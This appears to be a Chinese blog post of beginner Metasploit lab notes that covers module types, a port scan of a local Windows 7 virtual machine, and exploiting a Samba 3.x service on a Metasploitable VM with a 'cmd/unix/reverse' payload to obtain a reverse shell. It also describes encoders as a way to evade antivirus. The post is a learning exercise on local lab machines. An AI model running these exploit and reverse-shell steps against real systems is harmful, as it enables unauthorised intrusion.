1.更新

apt-get update:更新源

apt-get upgrade:更新软件包

apt-get dist-upgrade:升级系统

2. Metasploit基础

2.1专业名词

1. Auxiliaries(辅助模块) 扫描,嗅探,指纹识别

2. Exploit(漏洞利用模块) 针对漏洞进行攻击

3. Payload:目标被渗透之后的完成实际攻击功能的代码如添加一个用户,关机等等

4. Post(后期渗透模块): 后渗透的一些攻击:获取敏感信息,实现天半攻击等

5. Encoders:免杀,混淆

2.2 渗透步骤

• 扫描目标主机,寻找漏洞

• 选择并配置一个Exploit

• 选择并配置一个Payload

• 选择一个Encoders

• 渗透攻击

3. 主机扫描

• ip 开放端口,可用服务等

3.1 使用Auxiliary进行端口扫描

• search portscan 搜索可用的扫描器

• use 使用该模块,可以输入全名,也可以输入序号(选用tcp扫描器)

• show options 显示需要设置的参数,required为yes的为必须包含的实际的值

  

• RHOSTS:待扫描的ip PORTS:扫描端口范围 THREADS:扫描线程

• set进行设置参数,unset取消参数的设置

• 以本地搭建好的一个win7虚拟机为例(ip 192.168.21.131)

• run或exploit进行扫描

• 结果:25 110端口显示开放(1-1000)

• 别的扫描模块待测试,互联网上也有人列举出了一些常用的扫描模块

3.2 使用nmap扫描

• msf下直接nmap

• 两次扫描均没什么结果

下面以 Metasploitable 虚拟机演示

安装: https://www.zhaosimeng.cn/ctcs/95.html

ip:192.168.21.132

4.0 漏洞利用

• 扫描信息 nmap -sV 192.168.21.132

• 目标主机上存在Samba3.x服务(对其进行攻击)

• search samba

• use 13 (13为excellent)

• show payloads并选用一款Linux下的payload

• set payload cmd/unix/reverse

• show options

  

• 然后run/exploit(中间虚拟机出现了点问题ip变为192.168.21.133)

• 如图反弹一个shell

最新文章

1. javascript --- 设计模式之构造函数模式
2. SpringMVC+MyBatis+EasyUI 实现分页查询
3. struts1老古董配置
4. ML 01、机器学习概论
5. Sublime Text 3 安装及简单配置
6. Windows的免費hMailServer搭配SpamAssassin過濾垃圾郵件：安裝與設定
7. Vs2010中水晶报表引用及打包
8. Thrift入门
9. LeetCode算法题-Base 7（Java实现）
10. BZOJ 3687: 简单题 bitset
11. @ControllerAdvice详解
12. 01 of lenrning python
13. linux的systemctl服务及其使用
14. JavaScript基础知识（初识JS）
15. day30
16. LRN（local response normalization--局部响应标准化）
17. Oracle数据库中的数据出错的解决办法
18. karma + jasmine 构建前端自动化测试
19. ios 获得通讯录中联系人的所有属性 亲测，可行 兼容io6 和 ios 7
20. mod_pagespeed

热门文章

1. Springboot使用自定义注解实现简单参数加密解密(注解+HandlerMethodArgumentResolver)
2. pycharm工程包导入问题
3. 在Centos7下搭建大数据环境，即Zookeeper+Hadoop+HBase
4. Ubuntu查看文件格式（后缀名）
5. spring中BeanPostProcessor之一：InstantiationAwareBeanPostProcessor（01）
6. 使用Dism命令对Win7镜像进行操作
7. webpack4.x 从零开始配置vue 项目（三）
8. 原生的js操作实现通过对URL的监控获取参数
9. Git应用详解第二讲：Git删除、修改、撤销操作
10. 使用Azure Rest API获得Access Token介绍